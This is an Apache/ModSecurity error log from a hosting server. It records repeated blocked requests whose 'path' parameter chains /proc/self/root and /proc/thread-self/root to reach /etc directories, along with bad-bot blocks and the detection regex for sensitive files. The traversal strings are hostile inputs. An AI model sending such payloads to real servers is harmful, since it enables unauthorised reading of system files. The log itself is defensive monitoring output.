[Wed Mar 18 10:11:48.726785 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:51314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqklNY0UrI5A3LftIygcgAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:11:50.051168 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:52846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkltY0UrI5A3LftIygdAAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:11:51.349444 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:52854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkl8df6f5d65gmYZTPGQAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:11:56.491579 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:58062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqknEzinOy1jxa1j4cPBAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:11:57.435172 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:52870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkncdf6f5d65gmYZTPHwAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:12:01.303132 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:36188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkoeyqAr6etmhZHNq5XQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:12:07.195162 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:52886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkp9Y0UrI5A3LftIygfQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:12:08.503168 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:54398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkqOyqAr6etmhZHNq5ZgAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:12:28.647457 2026] [mime_magic:error] [pid 15051:tid 140411691570944] (70014)End of file found: [client 74.7.243.128:57150] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/bin
[Wed Mar 18 10:12:47.709783 2026] [mime_magic:error] [pid 15826:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:34054] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:13:18.407968 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:44190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqk7kzinOy1jxa1j4cPUgAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:13:20.927096 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:39234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqk8CmAPhZkrhU8w4lnSAAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:13:26.270945 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.244.43:43370] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqk9vu8EFLIOrSqIpv-4QAAAlc"]
[Wed Mar 18 10:13:29.758771 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.228.61:48324] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqk-UzinOy1jxa1j4cPUwAAAQo"]
[Wed Mar 18 10:13:33.610577 2026] [mime_magic:error] [pid 17653:tid 140411540502272] (70014)End of file found: [client 74.7.243.128:39248] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc
[Wed Mar 18 10:14:00.843945 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:36192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqlGOoXxyEfFpUF8f9oaAAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:14:16.710978 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:51754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqlKOoXxyEfFpUF8f9ofAAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:14:59.874009 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:40362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqlU_u8EFLIOrSqIpv_RgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:15:43.763270 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:44298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqlf-yqAr6etmhZHNq6FwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:15:45.196324 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:37180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqlgcdf6f5d65gmYZTPuQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:15:54.049563 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:37188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqlikzinOy1jxa1j4cP3gAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:15:56.405854 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:33462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqljEzinOy1jxa1j4cP5AAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:15:57.659766 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:33470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqljQkwaGbbGflqUZAK7AAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:16:35.568894 2026] [mime_magic:error] [pid 17653:tid 140411674785536] (70014)End of file found: [client 74.7.241.31:50932] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware
[Wed Mar 18 10:16:53.655529 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:46476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqlxQkwaGbbGflqUZALGwAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:16:55.046971 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:41564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqlx9Y0UrI5A3LftIyhQAAAAYg"], referer: 